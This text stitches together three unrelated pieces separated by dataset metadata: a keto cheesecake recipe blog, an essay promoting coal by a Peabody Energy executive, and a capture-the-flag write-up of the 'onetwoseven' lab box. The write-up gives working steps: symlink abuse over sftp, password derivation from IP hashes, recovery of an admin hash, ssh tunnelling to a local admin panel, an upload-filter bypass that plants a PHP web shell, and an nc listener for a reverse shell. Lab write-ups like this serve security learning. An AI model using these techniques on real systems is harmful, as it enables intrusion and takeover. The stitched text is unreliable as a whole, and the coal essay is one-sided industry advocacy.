First things first, let’s talk necessary kitchen equipment. For this cheesecake, you are going to need a springform pan. That’s a pan that has a removable bottom, as pictured above. Think of the springform pan as more of a mold than a traditional cake pan. You cook the cheesecake in it, then remove it from around the cheesecake, hopefully without cracking the top. I like to lay a piece of parchment paper over the bottom part of the pan, then attach the ring around it so the paper peeks out around the sides. Then, when my cheesecake is done, I can transfer it easily to a serving plate while removing the side and bottom for easy cleanup.
Preheat your oven to 400.
Combine your pecan pieces, almond flour, flaxmeal, and coconut oil. Add sweetener and cinnamon to taste. If you add those to the crust, it flavors it like graham crackers, a nice nod to the more traditional cheesecake crust.
You may need to zap this concoction in the microwave if your coconut oil is solidified. The house I live in maintains a temperature roughly equivalent to hell, so I don’t have to worry about that. Press the mixture firmly into the bottom of the springform pan. If you used parchment paper, you do not need to grease the bottom of the pan. If you didn’t, butter that shit up.
Bake the crust until it turns a golden brown. Mine ranges from 5-8 minutes. I used to like to just use Caveman Keto’s crust, but I decided to try to mix in some flaxmeal and I actually like this version better. It’s more firm and less crumbly, which I prefer. It holds together better.
Oh, and yeah. While that is baking away, mix everything else together in your mixer. Or beat it with a mixer. Somehow incorporate all the ingredients into a flawless, creamy goodness. Then when the crust is done, grease up the sides of the springform pan and pour your mixture into it.
Smooth the filling out as best you can. I like to tap the whole pan lightly on the counter to help it settle and to also help release air bubbles, which are a potential culprit of cracks. For some reason I did NOT tap this pan, and you can definitely tell in the end results. I wish I had pictures of the first cheesecake I made – it was gorgeous and crack-free. Ahh, you’ll just have to take my word for it.
So let’s talk some more about cracks. Cheesecakes are very sensitive, and if you don’t bake them very very carefully, they can develop ugly cracks across the top. It’s unattractive, and it’s the goal of all cheesecake baking enthusiasts to produce a flawless cake. It’s like, your status symbol, or something. The prime culprit for cracks is temperature fluctuations, and there are a few ways to combat this.
Never bake your cheesecake hotter than 350. Low and slow is the way to go. In fact, since you just baked the crust at 400, leave the oven door open until it cools down. You don’t want to stick it into a too-hot oven. Use a water bath. You can literally sit the springform pan in a pan of water. For these cheesecakes, I just placed a cake pan of water on the lower oven rack to steam and keep the oven moist. Don’t over-beat the filling, because – as I mentioned before – too much air can cause cracking. I’m not going to lie, I just let my KitchenAid run, so I like to let my filling sit in the springform pan for a good 10 minutes or so to settle some, before I tap it to let out even more air. Don’t open the oven door while it’s cooking. The sudden rush of cool air can cause cracks. Cut off the cheesecake at 50 minutes, and let it sit in the oven with the door shut for some time. Maybe an hour later, crack the oven door. Then a half hour after that, open it fully. And then remove the cheesecake, and run a knife along the edges of the pan to make sure that it’s not stuck (although it shouldn’t be if you greased it properly). The cheesecake shrinks as it cools, and if it’s glommed onto the side of the pan, it will surely crack as it tries to pull away.
So again, bake your cheesecake at 350 for 50 minutes. If it doesn’t look quite done, it’s probably not – but it will continue to bake residually after you turn off the oven and begin the cooling-down process. It should be nicely browned by that point, though the center may look like it’s not quite set. Trust me, after you get through with waiting for it to cool enough to handle safely, you’ll have a beauty waiting on you.
Or you might have something that looks like that. Yeah, so I didn’t follow my own advice, and cheesecake numero dos – the one I shot for this blog – turned out kind of fugly. Ah, well. It was still delicious. You also have the luxury of disguising the ugliness by whipping up a fruit topping or covering it with a dark chocolate ganache. Since I served this one to my family at Easter, we just sliced it plain and topped it with strawberries.
Oh, and before I forget to tell you – stick this baby in the refrigerator and let it sit for several hours before you eat it. We had a slice of the first one after a few hours, and it was okay. But 12 hours later, it was a rockstar. For this second cake, I just popped it in the fridge overnight and allowed it to set up properly before Easter dinner. Although you’ll want to chow down immediately, try to wait until it gets properly cold :) It’s totally worth it!
And let me tell you, even though Canadian Bacon and I are the only ketopians in the family, the cheesecake was a decisive hit. No one could tell that it was low carb. It didn’t taste funny from the combo of Splenda and Torani. It was flavored throughout with a delicate vanilla, and paired wonderfully with the sweet berries and whipped cream. It was tall and thick and reminiscent of the pieces of plain cheesecake you get at The Cheesecake Factory. Forreals.
My Fitness Pal has changed the way you input recipes, so I can’t post my typical ingredient log picture below. But at 8 servings, this cheesecake has 439 calories, 8g net carbs, 11g protein, and 38g fat per slice. It’s very dense and creamy and filling. Hell, it’s so low carb that my diabetic grandfather’s bloodsugar crashed a couple of hours after eating a piece… seriously!
It’s so good that my cats tried to eat it while I was taking photos of it. You’re not fooling anyone, Storm.
Leave a comment with your thoughts! I read every comment and I love talking to this community. Make sure you Like my Facebook page so you can see when I do Live cooking videos and follow my Instagram to view my daily meals. If one of my recipes looks good to you, hit the pin button to share it on Pinterest! And don’t forget to subscribe to my YouTube channel for fun product reviews, vlogs and more.
Print Pin New York-Style Keto Cheesecake Servings 8 Ingredients 8oz package cream cheese
1 cup sour cream
4 eggs
1 cup splenda (or sweetener of your choice)
3/4 cup heavy cream
1/2 cup coconut flour
1 tbsp vanilla extract
3 tbsp sugarfree Torani Syrup This time I used French Vanilla Instructions Preheat your oven to 400.
Combine your pecan pieces, almond flour, flaxmeal, and coconut oil. Add sweetener and cinnamon to taste.
You may need to microwave this concoction if your coconut oil is solidified
Press the mixture firmly into the bottom of the springform pan. If you used parchment paper, you do not need to grease the bottom of the pan. If you didn’t, butter that up (SPRING FORM PAN RECOMMENDED)
Bake the crust until it turns a golden brown. Mine ranges from 5-8 minutes.
While that is baking away, mix everything else together in your mixer. Or beat it with a mixer. Somehow incorporate all the ingredients into a flawless, creamy goodness.
Then when the crust is done, grease up the sides of the springform pan and pour your mixture into it.
Smooth the filling out as best you can. I like to tap the whole pan lightly on the counter to help it settle and to also help release air bubbles, which are a potential culprit of cracks
Bake your cheesecake at 350 for 50 minutes. If it doesn’t look quite done, it’s probably not – but it will continue to bake residually after you turn off the oven and begin the cooling-down process.
Tip: Stick this baby in the refrigerator and let it sit for several hours before you eat it.
(As a disclaimer, the product links are linked to my Amazon Affiliate account. I’ve never used this before but I’m going to give it a shot and see how well it works. In theory, I should get a small kickback if you purchase the product through that link. Product costs are not increased for you, just Amazon gives me a tiny percent of the profit for sending you their way. Maybe I’ll get rich and can retire from this life of crime.) | {
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Fueling the Future with 21st Century Coal
For 16 years Thabo Molubi’s productive day finished when the sun set. Without access to electricity, this South African furniture maker carved out a meager living with his hands. Then, an electrical line reached his village in the veld—and everything changed. He installed lights, power saws, and drills. He quadrupled productivity, improved product quality, and was able to hire local workers to sell his furniture far beyond his village.
Thabo Molubi joined the tens of millions of people who, every year, are leaving grinding poverty behind and entering the global middle class. When I came across Molubi’s story in a piece by the American author Paul Driessen,1 I was reminded of a conversation at the World Energy Congress. I had just concluded a speech calling on world leaders to prioritize an end to energy poverty. This is an environmental and energy crisis few acknowledge—yet it is far more immediate than the remote targets and timelines that consume the current conversation. After my remarks, a delegate from an African development bank approached. He noted that I was the first speaker to address an issue that was so central to his work. “Why,” he asked, “do so many well-meaning officials claim to champion the developing world while denying access to the low-cost energy that could meaningfully improve the standard of living of impoverished people?”
The picture exemplifies how Peabody Energy advances sustainable mining practices to restore coal-mined lands to prime and productive farmland here in central Indiana, as well as across the United States and Australia.
Why indeed? An answer can be found in the widening fault line between the energy approaches of the developed and developing worlds. The world’s rising economies recognize that energy is a human right and a growing need. Studies show that each tenfold increase in electricity is linked to a 10-year increase in life, and the United NationsA has linked life expectancy, educational attainment, and income with per capita energy use.2 In fact, access to affordable energy is instrumental to the achievement of the United Nations’ Millennium Development Goals, which range from halving extreme poverty rates to achieving universal primary education by 2015.
The Challenge Defined
Energy is as essential to our quality of life as food or water, and yet more than half the world’s population, 3.6 billion people, lack proper energy access and 1.3 billion people have no electricity access at all.3,4 These men, women, and children finish their days early due to a lack of light. No refrigeration is available to keep food and medicines fresh. Doctors and nurses serve an estimated one billion patients in the dark. And approximately half of all primary school students in the developing world must study by candlelight.B
It is flatly unacceptable that, in the 21st century, hundreds of millions of people still rely on traditional biomass for cooking and heat. In some nations, stoves burning wood, agricultural residues, and other wastes account for more than 90% of household energy consumption. Often women and children spend hours gathering these fuels—an activity that deforests landscapes, damages ecosystems, and wastes enormous human potential. The World Health Organization estimates that each year 1.3 million4 people die as the result of fumes from these indoor stoves.5
Without action, this gap can only grow. By mid-century, the global population is expected to reach nine billion people6; five out of every 10 could lack adequate access to energy based on predicted population growth. And while projected energy needs are staggering in the developing world, energy disparities are expanding even in the most developed nations. The International Energy Agency (IEA) called on nations to invest US$41 billion annually or risk failure in the global effort to eradicate energy poverty.7
This is a human tragedy, and an environmental crisis, that is entirely preventable.
A Solution Delivered
As overwhelming demand looms, developing nations have embraced what, to some, is an unlikely solution: 21st Century Coal. The term “21st Century Coal” was introduced by the governments of China and the U.S. in 2009, in the context of an international partnership to advance the development of clean energy solutions from coal. It more broadly symbolizes the essential role of coal in achieving the world’s shared energy, economic, and environmental objectives. It also describes state-of-the-art advances across the industry in areas of safety, productivity, sustainability, and near-zero emissions technology in recent decades.
Few fully recognize the stark differences between negative stereotypes about coal mining and use and current reality. New technologies and coal mining techniques have made economic and environmental goals compatible and achievable. Consider the experience of the U.S., where technical investment transformed coal use into a great environmental success story. Tens of billions of dollars have been invested by U.S. utilities in clean coal technologies to reduce emissions over the past several decades. Since 1970, key emissions from coal-fueled generation have been reduced by 87% per megawatt hour8 during a time when coal electricity increased 115% and real U.S. gross domestic product more than tripled.
“Smokestacks” for coal plants have now become steam stacks, and a study in the NewEnglandJournalofMedicine9revealed that air quality in major American cities is better than at any time in the last two decades, contributing to measurable improvements in life expectancy—even as coal continues to provide more than 40% of U.S. power.
21st Century Coal on the Prairie
21st Century Coal plants represent another leap forward, including one project not far from the headquarters of my company, Peabody Energy, in the U.S. Midwest. Equipped with $1 billion in environmental controls, the Prairie State Energy Campus in southern Illinois is one of the cleanest coal-fueled power plants ever built and the largest to come on line in the U.S. in more than three decades. Prairie State, which was developed by Peabody, has achieved one-fifth the key emissions of conventional coal generating units while creating thousands of jobs.
Upgrading the world’s coal fleet with technologies like Prairie State would deliver a 90% improvement in sulfur dioxide, 93% less nitrogen oxide, and virtually zero particulates, while dramatically reducing the burning of fuel wood and waste that causes enormous indoor air pollution in developing nations. Today’s efficient plants also achieve a carbon dioxide emissions rate that is as much as 40% less than older plants being replaced (see Figure 1 for a comparison of CO2 emissions versus net power plant efficiency).
Replacing the world’s older coal plants with advanced generation would be the carbon emissions equivalent of removing the entire U.S. passenger car fleet from the roads. Doing so also would drive $4.3 trillion in economic gains and 21 million new construction jobs, according to a study by Management Information Services.10
The fact that this can be accomplished today with commercial technologies is not lost on the leaders of the world’s best economies.
Nations such as China face what is often called a “prosperity paradox.” In a single generation, China has lifted hundreds of millions of people out of poverty—an accomplishment unparalleled in human history. Chinese use of low-cost coal has powered this prosperity, with coal use increasing 260% since 1990 as China’s Gross Domestic Product rose 20-fold in nominal terms. The correlation prompted the IEA to call China a “coal-fueled economic miracle.”11 And yet, China also faces intense pressures due to the pace of its urbanization and industrialization that threaten to undermine its achievement. Some 200 million Chinese moved to megacities in the past decade in the largest human migration ever recorded, and the China Institute for Reform and Development estimates that this number could double by 2020. Within the next 10 years, more people could urbanize in China than live in the entire U.S.
This prosperity paradox is echoed in developing nations around the world. Every day, more than 367,000 people are born.12 Hundreds of millions more Thabo Molubis will soon be looking for a better life through modern power, and energy use is expected to intensify as a direct result. Many are asking how we can meet such enormous need without straining scant resources and degrading environmental quality.
Once again, China is leading the way to the answer. This Asian nation recognizes that advancing energy access through greater use of coal need not come at the expense of environmental progress. Economic strength has been linked with clean air and water in much of the world. Evidence and common sense tell us that more prosperous nations can afford greater environmental protections and more advanced technologies. This is why China is prioritizing economic and technological development as the most effective path to cleaner air. Chinese leaders are building more supercritical and ultra-supercritical coal plants than any other nation in the world. This one nation represents a remarkable 55% of the global advanced coal- fueled generation that is expected to come online by 2017 (see Figure 2 for the projected coal demand growth through 2035).13 As part of the country’s 12th five-year plan—its national blueprint for economic and social development—China has committed to decommissioning the nation’s oldest plants and deploying modern emissions control technologies in the existing fleet. These advances cannot arrive soon enough. China’s per capita electricity use today is equal to the U.S. in 1955; India’s per capita electricity use is equal to the U.S. in 1920. We are just at the beginning of this story.
We also are just beginning to realize the potential of the next phase of 21st Century Coal technologies involving carbon dioxide capture, use, and storage (CCUS). While many proposed climate change policies continue to divide the global public, the science behind coal with carbon management is solid and widely understood. Studies indicate coal with CCUS is cost competitive with nuclear and natural gas with CCUS. These “green coal” technologies achieve near- zero greenhouse gas emissions by capturing and injecting carbon dioxide into aging oil fields to recover stranded oil or sending it deep into saline aquifers or other geological formations for safe storage.
Perhaps the best example of green coal is a plant just outside Tianjin, China. GreenGen is a major coal gasification plant that will ultimately reuse carbon dioxide for enhanced oil recovery. It is one of the world’s largest near-zero emissions projects, it began generating commercial power in 2012, and Peabody is the only non-Chinese partner in the project.
The Modern Coal Mine
A visit to Prairie State or GreenGen dispels many myths about coal-fueled electricity generation today. Similarly, I find that visitors to Peabody’s mining operations from outside the industry are amazed by the scale and sophistication of modern coal mining. Contrary to popular belief, most mining occurs above ground; 60% of global coal production, 67% of U.S. output, and 80% of Australian coal comes from surface operations. The best operations are characterized by large size, world-class safety and health management systems, highly skilled workforces, and state-of-the-art machinery.
21st Century Coal mining operations demand an intense focus on the fundamentals of operational excellence. Everything matters—from environmental standards to workforce training. But no issue is of greater importance than safety. For example, Peabody recently delivered the safest year in company history in 2012 by making safety a way of life, a method of working and living. Our focus on delivering zero incidents of any kind is relentless and resulted in a global incidence rate of 1.82 last year, a 9% improvement from 2011 and the fifth consecutive year of record safety performance. Peabody is not alone: In the U.S., working at a mine is safer than working in a shopping mall, in construction, or many other fields according to incidence rate data from the U.S. Occupational Safety and Health Administration and the U.S. Mine Safety and Health Administration.
Having made a career in mining, I have a deep respect for those who choose this industry as a career, and I also recognize the scope of our collective responsibility to ensure that effective health and safety standards are in place and followed. For this reason, during my Chairmanship of the Peabody Energy’s Coppabella Mine in Australia Serves Export Markets in Asia and Produces Low-Volatile Pulverized Coal Injection Coal to Make Steel
National Mining Association (NMA), we established a CEO Safety Task Force which set an industry goal of eliminating fatalities and reducing reportable injuries by 50% within five years. To accomplish this objective, representatives of NMA member companies collaborated on development of a model safety and health management system called CORESafety, which is based on the best practices of other industries. The CORESafety system is designed to be adaptable to all mining companies, is complementary to existing safety and health initiatives, and is currently being implemented across the U.S. mining industry.
Peabody has sought to share best practices and forge global partnerships that can result in improved safety performance, resource recovery rates, land restoration, water resource management, and environmental monitoring. When mining is complete, lands are returned to a condition that is the same, and often far better, than before mining occurred. For example, in 2012 Peabody Energy alone restored more than 4000 acres of wetlands, prime farmland, forests, and prairie across two continents and recycled more than 18,000 tons of materials.
China is making significant progress in this area, as well, and has responded to recent safety and environmental challenges by shuttering small, less-regulated mines and emphasizing win-win international partnerships that promise to introduce advanced, large-scale surface mining techniques in its far western regions.
21st Century Coal mining also features machines of significant size and complexity, including haul trucks capable of carrying more than 400 tons, massive shovels and draglines, and underground longwall mining systems with more parts than an average supercomputer. Peabody commissioned a haul truck capable of holding 447 tons, enough to qualify for the GuinnessBookofWorldRecords, and we developed a conveyor and blending system at our North Antelope Rochelle Mine (NARM) in Wyoming that enables this single operation to transport and blend coal over great distances with precision.
The pace of innovation is intense, but the potential for improving lives and livelihoods is immense. The world has nearly a trillion tons of proven coal, which makes up 60% of global energy resources. Coal is widely dispersed and broadly available, Peabody Energy Operators Monitor Real-Time Computerized Dispatching Technologies that Monitor Productivity and Improve Operating Efficiencies with coal mines in 70 nations (the top 10 coal producers are listed in Table 1). Coal also is easily transported, reliable, and affordable.12 It remains the leading baseload fuel to replace declining nuclear generation and maintains a distinct cost advantage over liquefied natural gas globally.
Table 1. List of top 10 global coal producing countries
Fueling the Future
Looking ahead, it is time to find some common ground on coal. For too long, energy policies in many nations have defaulted into predictable positions: business against activists, coal versus gas versus renewables, nation versus nation. The world often seems entrenched in a debate based on fixed opinions and fuzzy data. It is time to recognize the realities of 21st Century Coal mining and use. It is also time to empower people like Thabo Molubi to achieve better health and wealth through the greater use of affordable energy, which largely comes from coal.
Common sense tells us that the world cannot regulate, tax, or conserve its way out of our current global economic stagnation. The solution is a balanced policy framework that encourages and rewards greater use of coal in a low-carbon way. 21st Century Coal can combat energy poverty and fuel an industrial rebirth. We believe it will take five steps, what we call the Peabody Plan:
First: We must work to eliminate energy poverty by ensuring that at least half of new generation is fueled by coal;
It is time to finally approach energy issues pragmatically—and recognize that the answers are right under our feet. It is time to act on available technology solutions. It is time to rebuild our nuclear power infrastructure, explore for natural gas and oil, and develop more cost-efficient renewables. Most of all, it is time to drive an energy technology renaissance with 21st Century Coal.
A. Analysis by Dr. Frank Clemente, Pennsylvania State University, based on International Energy Agency World Energy Outlook, 2012, and The World Bank World Development Indicators, 2012. | {
"pile_set_name": "Pile-CC"
} |
Aug 31, 2019 | 24 minutes read
Tags: hack-the-box, ssh tunneling, tunnels, sftp, php, apt, apt-get, man-in-the-middle, mitm, unrestricted-file-upload, sudo, linux, source-code-analysis
My hat goes off to onetwoseven’s creator jkr; this box was top-notch. The flow of the box was seamless. Enumeration felt like a natural progression and the breadcrumbs were plentiful and placed in logical locations (often in more than one spot to facilitate multiple avenues of approach). I was really impressed with his first box submission. His second box Writeup is still active and not as difficult, but still high quality. At the time of this writing, onetwoseven is about to be replaced by another jkr box: zetta. I’m definitely looking forward to it!
As usual, we start with a masscan followed by a targeted nmap .
masscan -e tun0 --ports U:0-65535,0-65535 --rate 700 -oL masscan. ══════════════════════════════════════════════════════════════════════════════════════════════ open tcp 22 1562031220 open tcp 80 1562031259
nmap -p 22,80 -sC -sV -oA nmap. ════════════════════════════════════════════════════════ PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0) | ssh-hostkey: | 2048 48:6c:93:34:16:58:05:eb:9a:e5:5b:96:b6:d5:14:aa (RSA) | 256 32:b7:f3:e2:6d:ac:94:3e:6f:11:d8:05:b9:69:58:45 (ECDSA) |_ 256 35:52:04:dc:32:69:1a:b7:52:76:06:e3:6c:17:1e:ad (ED25519) 80/tcp open http Apache httpd 2.4.25 ((Debian)) |_http-server-header: Apache/2.4.25 (Debian) |_http-title: Page moved. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Initial Access
Normally, this is where we would perform forced browsing or some form of automated web scan. However, there is rate-limiting, so we need to manually browse the site. There’s a portion of the site that tells us as much, though most folks found out the hard way.
While browsing, we come across and see that it provides us credentials for sftp .
We also see the use of a domain name onetwoseven.htb . Before moving on, let’s update our local DNS entry for the box in /etc/hosts .
/etc/hosts ══════════ -------------8<------------- onetwoseven.htb -------------8<-------------
With that done, let’s check out what we have access to on the remote filesystem.
We’ll start by accessing the sftp server as our pre-generated user. Because uploading and executing a web shell does not work, let’s check out what commands are available to us with the help command.
sftp [email protected] [email protected]'s password: 122f1def Connected to [email protected]. sftp> help -------------8<------------- lmkdir path Create local directory ln [-s] oldpath newpath Link remote file (-s for symlink) lpwd Print local working directory ls [-1afhlnrSt] [path] Display remote directory listing -------------8<-------------ln - symlink oldpath newpath Symlink remote file -------------8<-------------
Creating a symlink sounds like it has potential and the public_html folder is writable; let’s see where it takes us.
Source Code Recovery
Let’s begin with some source code recovery. We’ll utilize the symlink command to allow us to browse the raw php files. Some files of interest that we can examine are signup.php and index.php . If we try to symlink to these files using the same name (i.e. with the php extension), we’ll run into problems with the server trying to execute the php. Instead, we’ll drop the php extension so we can recover the source code.
sftp> ln -s /var/www/html/index.php index sftp> ln -s /var/www/html/signup.php signup
Let’s take a look at index first. We can’t view/get the files from within the sftp shell. The trick here is that we need to enter view-source: in our browser. When we do, we’re presented with the php source code. In it, we can see a breadcrumb. It lets us know that if we are accessing this page from the server itself ( or, a link to the admin panel will be visible. The admin panel itself appears to be listening on port 60080 . We’ll keep this in mind as we progress.
The next file, signup , contains a juicy piece of information. Specifically, it shows us how usernames and passwords are generated for the sftp logins.
Let’s confirm what the username function does with our ip address.
1 php > $hash = md5(''); 2 php > print $hash; 3 122f1def6a8b5601963ee3163b041696 4 5 php > $first_username = substr($hash, 0, 8); 6 php > print $first_username; 7 122f1def 8 9 php > print base64_encode($first_username); 10 MTIyZjFkZWY= 11 php > $encoded_username = base64_encode($first_username); 12 13 php > print str_replace('=', '', $encoded_username); 14 MTIyZjFkZWY 15 php > $replaced_username = str_replace('=', '', $encoded_username); 16 17 php > print substr($replaced_username, 3); 18 yZjFkZWY 19 20 php > $final = substr($replaced_username, 3); 21 php > print "ots-" . $final; 22 ots-yZjFkZWY
line 1: generates the md5sum of the given ip address
line 5: grabs the first 8 characters of the hashed ip
line 9: base64 encodes the shortened hash
line 13: removes any equal signs from the string
line 17: returns a substring of the shortened/replaced hash starting with the fourth character and going out to the end of the string
line 21: concatenates the string “ots-” with the result of all the above actions, giving us our username
The password is much less complex.
php > $hash = md5(''); php > print substr($hash, 0, 8); 122f1def
Ok, so why do we care? If any other users follow the ots- pattern, we can get their password! Let’s check out /etc/passwd and see if there are any users of interest.
Back in our sftp shell, we can symlink /etc/passwd and check out the contents.
sftp> ln -s /etc/passwd passwd
ots-yODc2NGQ:x:999:999: ots-yZjFkZWY:x:1001:1001:
In the output above, we can see our username. The nice thing here is that the ip address is noted in the GECOS field of each /etc/passwd entry. Let’s take the next logical step and grab the password for the user associated with!
php > print substr(md5(''), 0, 8); f528764d
There we have it, a set of credentials! Let’s use them on the sftp service.
sftp [email protected] [email protected]'s password: f528764d Connected to [email protected]. sftp> ls -al drwxr-xr-x 3 0 0 4096 Feb 15 2019 . drwxr-xr-x 3 0 0 4096 Feb 15 2019 .. drwxr-xr-x 2 999 999 4096 Feb 15 2019 public_html -r--r----- 1 0 999 33 Feb 15 2019 user.txt
After logging in, we see user.txt waiting for us. All that’s left is to download it and turn it in!
sftp> get user.txt Fetching /user.txt to user.txt /user.txt 100% 33 0.3KB/s 00:00
cat user.txt ════════════ 93a4...
Hol’up. We don’t even have a shell? Let’s fix that as we go for root.
Unauth to www-admin-data
Let’s revisit the sftp server yet again. This time, we’ll link the root of the filesystem (or at least our view of it).
sftp> cd public_html/ sftp> ln -s / root
We’ll make use of our browser again to view the results.
Drilling down into the folders, the only file of interest we have permission to browse to at this point is .login.php.swp , located at http://onetwoseven.htb/~ots-mODVhZTM/var/www/html-admin/ .
Let’s download the file and analyze its contents. Running the file command on .login.php.swp shows us that it’s a vim swap file. (firefox may have named the file login.php.swp on your behalf, don’t sweat it. The following steps work either way)
file .login.php.swp ═══════════════════ login.php.swp: Vim swap file, version 8.0, pid 1861, user root, host onetwoseven, file /var/www/html-admin/login.php
In this case, when vim opened the login.php file for editing, it created a hidden swap file .login.php.swp . This is pretty standard vim behavior and it’s quite common to see these laying around as a result of vim exiting in a weird state or vim editors being left open. Luckily for us, having the swap file makes it incredibly easy to recover the original file.
vim -r .login.php.swp ═════════════════════ Using swap file ".login.php.swp" "/var/www/html-admin/login.php" [New DIRECTORY] Recovery completed. You should check if everything is OK. (You might want to write out this file under another name and run diff with the original file to check for changes) You may want to delete the .swp file now. Press ENTER or type command to continue
Once we’re presented with the prompt above, we can press ENTER and revel in the glory of our freshly recovered file. There are a few lines that we’re definitely concerned with; we’ll start with line #1.
1 <?php if ( $_SERVER[ 'SERVER_PORT' ] != 60080 ) { die (); } ?> 2
Line #1 tells us that we can expect the server running this php file to be on port 60080. Recall from our source code recovery that we’ve seen this port listed before. With all we’ve seen so far, it’s safe to assume that it will be running on localhost.
Next up, line #26 lets us know that this php file is tied to their backend administration.
26 < a class = "navbar-brand" href = "/login.php" >OneTwoSeven - Administration Backend</ a >
The really juicy stuff is on line #78; an admin username and password hash!
78 if ($_POST['username'] == 'ots-admin' && hash('sha256',$_POST['password']) == '11c5a42c9d74d5442ef3cc835bda1b3e7cc7f494e704a10d0de426b2fbe5cbd8') {
Often, we want to reach for the cool tools like hashcat. However, we can instead just use crackstation.net to get the cleartext password.
ssh Tunnel to Admin Panel
We’ve got creds to the admin panel, but we can’t get to the site (yet). Let’s try setting up an ssh tunnel to the admin panel.
ssh [email protected] [email protected]'s password: 122f1def This service allows sftp connections only. Connection to onetwoseven.htb closed.
Ok, we can’t ssh, or can we? Let’s add a -v to the ssh command and take a closer look.
ssh -v [email protected] OpenSSH_8.0p1 Debian-4, OpenSSL 1.1.1c 28 May 2019 debug1: Reading configuration data /etc/ssh/ssh_config debug1: /etc/ssh/ssh_config line 19: Applying options for * -------------8<------------- debug1: Next authentication method: password [email protected]'s password: 122f1def debug1: Authentication succeeded (password). Authenticated to onetwoseven.htb ([]:22). debug1: channel 0: new [client-session] debug1: Requesting [email protected] debug1: Entering interactive session.
The conclusion we can draw from the above output is that the connection succeeds and the ssh connection gets established before it is disconnected by the server. We’ll use this fact to set up an ssh forward tunnel to hit port 60080 on the server’s loopback address.
If you’re new to ssh tunneling, check out my writeup of Vault and follow along. There are a lot of traffic bending techniques to be learned on that one.
Two ssh options will assist us in setting up a tunnel without an interactive shell. Let’s check them out.
ssh -Nf [email protected] -L 60080: [email protected]'s password: 122f1def
ssh options used: -N Do not execute a remote command. This is useful for just forwarding ports. -f Requests ssh to go to background just before command execution. -L Specifies that connections to the given TCP port on the local (client) host are to be forwarded to the given host and port on the remote side.
Below we see a breakdown of the tunneling options used.
forward tunnel options used: 60080 The port on the local end to listen on; (kali:60080) Where the traffic is destined after reaching 60080 from the point of view of the creator of the tunnel (traffic will start on kali and be sent through to finally hit from's point of view) 60080 The port to which traffic is destined.
After running the command above, we’ll take a look at netstat on kali. When we do, we should see a listener on port 60080.
netstat -ntlp Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0* LISTEN 12068/ssh tcp 0 0* LISTEN 1/init tcp6 0 0 ::1:60080 :::* LISTEN 12068/ssh tcp6 0 0 :::111 :::* LISTEN 1/init tcp6 0 0 :::* LISTEN 27777/java
We can see that there is a listener on 60080 on our kali machine. Any traffic sent there will be forwarded to’s localhost interface on port 60080. Knowing that, we can browse to the local tunnel which will move all of our traffic through the tunnel over to the target.
Let’s check it out!
Admin Panel Web Shell
With our tunnel in place, we can browse to and see the login screen. We’ll proceed with our creds ots-admin:Homesweethome1
After logging in, we’re greeted by the addons menu.
The most obvious thing to try is the big Plugin Upload section at the bottom. We can use the developer tools to enable the Submit Query button.
When we view the button in the dev tools, we see a disabled attribute on the \<input\> tag.
We can simply remove the attribute to enable the button.
Let’s try to upload a simple php web shell a try for funsies. While we’re at it, let’s capture the POST request in Burp, as it will come in handy later.
shell.php ════════════════ <?php system ($_GET[ 'epi' ]); ?>
The website responds with a 404 error.
If we browse to , we can see a note that tells us disabled features result in 404 errors. We can assume that there has been an attempt to disable file upload functionality.
There is also a note on the page above:
The addon manager must not be executed directly but only via the provided RewriteRules
So, when we want to download one of the files listed on the menu, we request it via a URL similar to this:[SOME_PLUGIN] . Whenever addon-download.php is requested, the webserver internally rewrites the request to be addons/ots-man-addon.php . Notice that both addon-upload.php and addon-download.php are both handled by the same file: ots-man-addon.php .
Since we’re most interested in the file responsible for handling file upload and download, let’s use one of the handy links to the side of each addon ( [DL] ) and grab ots-man-addon.php to analyze its source.
Below is the snippet of code we’re concerned with. Everything below what’s shown here is unrelated to getting our shell on target.
1 <?php session_start (); if ( ! isset ($_SESSION[ 'username' ])) { header ( "Location: /login.php" ); }; if ( strpos ($_SERVER[ 'REQUEST_URI' ], '/addons/' ) !== false ) { die (); }; 2 # OneTwoSeven Admin Plugin 3 # OTS Addon Manager 4 switch ( true ) { 5 # Upload addon to addons folder. 6 case preg_match ( '/\/addon-upload.php/' ,$_SERVER[ 'REQUEST_URI' ]) : 7 if ( isset ($_FILES[ 'addon' ])){ 8 $errors = array (); 9 $file_name = basename ($_FILES[ 'addon' ][ 'name' ]); 10 $file_size = $_FILES[ 'addon' ][ 'size' ]; 11 $file_tmp = $_FILES[ 'addon' ][ 'tmp_name' ]; 12 13 if ($file_size > 20000 ){ 14 $errors[] = 'Module too big for addon manager. Please upload manually.' ; 15 } 16 17 if ( empty ($errors) == true ) { 18 move_uploaded_file ($file_tmp,$file_name); 19 header ( "Location: /menu.php" ); 20 header ( "Content-Type: text/plain" ); 21 echo "File uploaded successfull.y" ; 22 } else { 23 header ( "Location: /menu.php" ); 24 header ( "Content-Type: text/plain" ); 25 echo "Error uploading the file: " ; 26 print_r ($errors); 27 } 28 } 29 break ; 30
The first piece of code that concerns us is line 1. Below, we have line 1 in an easier to read format.
1 <?php 2 session_start (); 3 4 if ( ! isset ($_SESSION[ 'username' ])) 5 { 6 header ( "Location: /login.php" ); 7 }; 8 if ( strpos ($_SERVER[ 'REQUEST_URI' ], '/addons/' ) !== false ) 9 { 10 die (); 11 }; 12
line 8: if the string /addons/ is found anywhere in our URL, the server will sever our connection and our request will never proceed through the rest of the code
This means we can’t use the php file directly, but we can use the RewriteRules discussed above to get our requests to this file.
Next, we’ll take a look at hitting the case statement that controls entry into the code branch where file uploads occur.
6 case preg_match('/\/addon-upload.php/',$_SERVER['REQUEST_URI']):
The preg_match works on regular expression, so it’s slightly different than the strpos discussed above. We want the code on line 6 to evaluate to true to follow that branch of code. That means that we need to include the string /addon-upload.php somewhere in our URL. There’s a nice resource I use when playing with regex https://regex101.com. In the screenshot below, we’ve checked the radio button on the left to designate php-style regex. The regex itself doesn’t include the first and last / s. Those forward slashes denote the beginning and end of the regular expression, nothing more.
Recall our request that we captured in Burp earlier. We sent a request to and got a 404 response. We need a way to include the required string, but not get the 404.
From our discussion about RewriteRules, we know that there are two methods of requesting this file. We’re going to have to request to even get a request through to the file. Then, we just need to include the required string in the request.
Let’s go back to our captured request in Burp and alter the URL to match what we’ve found.
The only change we made is highlighted on the left. We changed the URL and resent the file upload request we captured earlier. This time, we clearly see the successful response message.
All that’s left to do is check that our shell.php works as intended.
For the sake of moving forward, let’s grab an interactive shell. First, spin up a listener.
nc -nvlp 12345
